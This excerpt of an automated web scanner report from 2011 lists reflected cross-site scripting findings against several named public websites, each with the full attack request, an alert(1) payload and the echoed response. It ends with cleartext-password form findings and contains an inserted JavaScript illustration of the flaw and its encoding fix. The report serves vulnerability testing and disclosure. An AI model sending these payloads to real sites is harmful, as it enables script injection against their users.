HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubse9577--><script>alert(1)</script>c9731df4bc1/009629399/apdxa.htm -->
...[SNIP]...

3.31. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e900a<script>alert(1)</script>bb50ef10f66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399e900a<script>alert(1)</script>bb50ef10f66/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:30 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399e900a<script>alert(1)</script>bb50ef10f66/apdxa.htm<br>
...[SNIP]...

3.32. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8440e--><script>alert(1)</script>525d718c1d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/0096293998440e--><script>alert(1)</script>525d718c1d7/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs/0096293998440e--><script>alert(1)</script>525d718c1d7/apdxa.htm -->
...[SNIP]...

3.33. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cb23c<script>alert(1)</script>f1cdaa4a54a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399/apdxa.htmcb23c<script>alert(1)</script>f1cdaa4a54a HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:36 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399/apdxa.htmcb23c<script>alert(1)</script>f1cdaa4a54a<br>
...[SNIP]...

3.34. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 12c6e--><script>alert(1)</script>401b79155a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
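The following is an added example, not code from the report, opengroup.org or barcelonaworldrace.org. It serves the HTML-comment findings (3.23, 3.30, 3.32, 3.34) and the plain-text ones (3.29, 3.31, 3.33) together, since both come from the same 404-page pattern: the requested path echoed once inside `<!-- re_url = ... -->` and once as page text. It includes a small comment-aware walk over the markup so "the script tag is only inside a comment" becomes something you can test rather than assume, including the `--!>` terminator that also closes a comment under the HTML parsing rules. Function names are hypothetical and the markup is a simplified stand-in.

```javascript
// Added example; not code from the report, barcelonaworldrace.org or
// opengroup.org. Models the 404-page pattern behind 3.23 and 3.29-3.34: the
// requested path is echoed inside an HTML comment and again as page text.
// Function names are hypothetical and the markup is a simplified stand-in.

function render404Vulnerable(path) {
  return "<!-- re_url = " + path + " -->\n<p>Not found:<br>" + path + "<br></p>";
}

// Entity-encode the characters that matter in HTML text. "-->" becomes
// "--&gt;" and "<script" becomes "&lt;script", so neither context can be left.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function render404Safe(path) {
  const p = encodeHtml(path);
  return "<!-- re_url = " + p + " -->\n<p>Not found:<br>" + p + "<br></p>";
}

// An HTML comment ends at "-->" and, per the HTML parsing rules, also at
// "--!>". Returns the index of the first terminator after `from`, or -1.
function commentEnd(html, from) {
  const a = html.indexOf("-->", from);
  const b = html.indexOf("--!>", from);
  if (a < 0) return b;
  if (b < 0) return a;
  return Math.min(a, b);
}

// Walk the document the way a tokenizer would: skip comment bodies and
// report whether a <script tag is reachable outside any comment.
function scriptOutsideComments(html) {
  let i = 0;
  while (i < html.length) {
    if (html.startsWith("<!--", i)) {
      const end = commentEnd(html, i + 4);
      if (end < 0) return false;                 // unterminated comment eats the rest
      i = end + (html.startsWith("--!>", end) ? 4 : 3);
    } else if (html.startsWith("<script", i)) {
      return true;
    } else {
      i++;
    }
  }
  return false;
}

// Constructed payloads with the same shapes as the report's canaries.
const COMMENT_PAYLOAD = "detail43a5a--><script>alert(1)</script>e94251ccb77";
const BANG_PAYLOAD = "detail43a5a--!><script>alert(1)</script>e94251ccb77";
const TEXT_PAYLOAD = "onlinepubs325e2<script>alert(1)</script>bd2a273b0b1";

console.log(scriptOutsideComments(render404Vulnerable(COMMENT_PAYLOAD))); // true
console.log(scriptOutsideComments(render404Vulnerable(BANG_PAYLOAD)));    // true
console.log(scriptOutsideComments(render404Safe(COMMENT_PAYLOAD)));       // false
```

Note that the safe variant does not try to strip `--` or `>` from the comment body; once `>` is an entity the comment cannot be closed, and the same encoder is what the plain-text echo on the next line needs anyway. The better answer for comment context is still not to emit request data there at all.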

Request

GET /onlinepubs/009629399/apdxa.htm12c6e--><script>alert(1)</script>401b79155a5 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 20 Jan 2011 00:50:38 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs/009629399/apdxa.htm12c6e--><script>alert(1)</script>401b79155a5 -->
...[SNIP]...

3.35. http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sailinganarchy.com
Path:   /article_submission.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33633"><script>alert(1)</script>e31b4d359f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article_submission.php/33633"><script>alert(1)</script>e31b4d359f HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:24:08 GMT
Server: Apache
Vary: User-Agent
Content-Length: 4013
Connection: close
Content-Type: text/html

<html>
<head>
<title>Article Submission</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/SA_CSS.css" rel="stylesheet" type="text/css">
<link href="/css
...[SNIP]...
<form name="Mail" enctype="multipart/form-data" method="post" action="/article_submission.php/33633"><script>alert(1)</script>e31b4d359f">
...[SNIP]...

3.36. http://www.stumbleupon.com/submit [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 324c3"style%3d"x%3aexpression(alert(1))"62d09b53079 was submitted in the url parameter. This input was echoed as 324c3"style="x:expression(alert(1))"62d09b53079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof of concept uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying attribute breakout (closing the value with a double quote) is browser-independent.

Request

GET /submit?url=http://blip.tv/file/4639878324c3"style%3d"x%3aexpression(alert(1))"62d09b53079&name=file HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=7uq02l81u9vnjk47rb8d4v21k5; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=20868528224d37870da13a17.85512699; expires=Sat, 19-Feb-2011 00:51:25 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 19-Feb-2011 00:51:25 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 19-Feb-2011 00:51:25 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=c496c4c580ae0340b0e0c108595a73d4%7C%7C10%7C%7C1295484685%7C4666508fd41d7fc3999dd8047eea63af; expires=Sun, 17-Jan-2021 00:51:25 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 49112
Date: Thu, 20 Jan 2011 00:51:25 GMT
X-Varnish: 16870564
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://blip.tv/file/4639878324c3"style="x:expression(alert(1))"62d09b53079" />
...[SNIP]...

3.37. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28d01"><script>alert(1)</script>bbf652f7ee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&28d01"><script>alert(1)</script>bbf652f7ee9=1 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ond=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: ourl=%3Fm%3DShare%26url%3Dhttp%253A%252F%252Fwww.elmundo.es%252Felmundo%252F2011%252F01%252F17%252Fnautica%252F1295254542.html%26p%3D; path=/; domain=.tuenti.com
Set-Cookie: keep_ru=1; path=/; domain=.tuenti.com
Set-Cookie: ue=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:41 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:42 GMT
Content-Length: 41848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&28d01"><script>alert(1)</script>bbf652f7ee9=1" id="lang_form_1">
...[SNIP]...

3.38. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3749"><script>alert(1)</script>3ddc78bf4c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /share?e3749"><script>alert(1)</script>3ddc78bf4c7=1 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:29 GMT
Content-Length: 39388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?e3749"><script>alert(1)</script>3ddc78bf4c7=1" id="lang_form_1">
...[SNIP]...

3.39. http://www.tuenti.com/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuenti.com
Path:   /share

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7df6b"><script>alert(1)</script>ac4474858b9 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html7df6b"><script>alert(1)</script>ac4474858b9 HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Connection: close
Date: Thu, 20 Jan 2011 00:51:32 GMT
Content-Length: 39461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...
<form method="post" action="?url=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html7df6b"><script>alert(1)</script>ac4474858b9" id="lang_form_1">
...[SNIP]...

3.40. http://www.yachtscoring.com/event_results_cumulative.cfm [eID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtscoring.com
Path:   /event_results_cumulative.cfm

Issue detail

The value of the eID request parameter is copied into the HTML document as plain text between tags. The payload 8d752<img%20src%3da%20onerror%3dalert(1)>fff5a8dd9fc was submitted in the eID parameter. This input was echoed as 8d752<img src=a onerror=alert(1)>fff5a8dd9fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /event_results_cumulative.cfm?eID=4088d752<img%20src%3da%20onerror%3dalert(1)>fff5a8dd9fc HTTP/1.1
Host: www.yachtscoring.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Invalid data 4088d752<img src=a onerror=alert(1)>fff5a8dd9fc for CFSQLTYPE CF_SQL_INTEGER.
Connection: close
Date: Thu, 20 Jan 2011 00:54:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=6963885;expires=Sat, 12-Jan-2041 00:54:31 GMT;path=/
Set-Cookie: CFTOKEN=55082400;expires=Sat, 12-Jan-2041 00:54:31 GMT;path=/
Set-Cookie: CFID=6963885;path=/
Set-Cookie: CFTOKEN=55082400;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">


                               
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 4088d752<img src=a onerror=alert(1)>fff5a8dd9fc for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

3.41. http://k.collective-media.net/cmadj/cm.martini/ [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9aed"%3balert(1)//1078342a1b4 was submitted in the cli cookie. This input was echoed as e9aed";alert(1)//1078342a1b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini/;sz=728x90;net=cm;ord=3271752524;ord1=707118;cmpgurl=http%253A//www.sailinganarchy.com/index_page1.php? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3e9aed"%3balert(1)//1078342a1b4; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:30:28 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:28 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:28 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Thu, 27-Jan-2011 00:30:28 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Thu, 20-Jan-2011 08:30:28 GMT
Content-Length: 7906

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3e9aed";alert(1)//1078342a1b4&seg_code=noseg&ord=1295483428");CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif");CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&re
...[SNIP]...

4. Cleartext submission of password
There are 7 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://americascup.mediaaccess.evolix.net/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://americascup.mediaaccess.evolix.net
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: americascup.mediaaccess.evolix.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:36:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7dd62b0baadb91dcf47f180dfeb400d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
<form name='identification' action='' method='get' enctype="multipart/form-data"><div id='tab_identite' style='display:none; '>
...[SNIP]...
<input name="login" id='login' type="text" class="form" >
psw&nbsp;<input name="psw" id='psw' type="password" class="form" >
<input type="button" class="form" value="ok"    name="submit" id='validezlogin' rel='The "Email" field is not adequately filled'>
...[SNIP]...

4.2. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:40:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899127717691648%3A164; expires=Fri, 21-Jan-2011 00:40:18 GMT; path=/; domain=digg.com
Set-Cookie: d=e77e75edfe85a5c092ebbce18a8db8a109d3f58ee422bb99aa8f404c459dbd21; expires=Tue, 19-Jan-2021 10:47:58 GMT; path=/; domain=.digg.com
X-Digg-Time: D=28518 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

4.3. http://translate.googleusercontent.com/translate_c

Summary

Severity:   High
Confidence:   Certain
Host:   http://translate.googleusercontent.com
Path:   /translate_c

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /translate_c?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&prev=_t&rurl=translate.google.com&usg=ALkJrhglTnSTIWJRTLWJxtBONK41T28E_A HTTP/1.1
Host: translate.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://translate.google.com/translate_p?hl=en&ie=UTF-8&sl=auto&tl=en&u=http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html&prev=_t&usg=ALkJrhjG6jHf6mTOkkomcii4GFk9D7ZJWg
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:16:30 GMT
Expires: Thu, 20 Jan 2011 00:16:30 GMT
Cache-Control: private, max-age=86400
Accept-Ranges: none
Content-Location: http://www.elmundo.es/elmundo/2011/01/17/nautica/1295254542.html
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=4d976405d4b1f367:TM=1295482589:LM=1295482590:S=snr5DTM1C3a-1gdp; expires=Sat, 19-Jan-2013 00:16:30 GMT; path=/; domain=translate.googleusercontent.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 139858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><script>(function (){ function t
...[SNIP]...
</h5><form action=/servicios/noticias/comentarios/login name=formulario_login_comentarios id=formulario_login_comentarios method=post> <span onmouseover="_tipon(this)" onmouseout="_tipoff()">
...[SNIP]...
</span> <input type=password id=formulario_login_comentarios_clave name=clave maxlength=50 value="" /><div class=aviso>
...[SNIP]...

4.4. http://www.americascupmedia.com/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.php HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:44:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=5df83766a88aa55095427a70359ae9f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 60255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media</
...[SNIP]...
<td colspan='2' class='typo_login' align='center'>
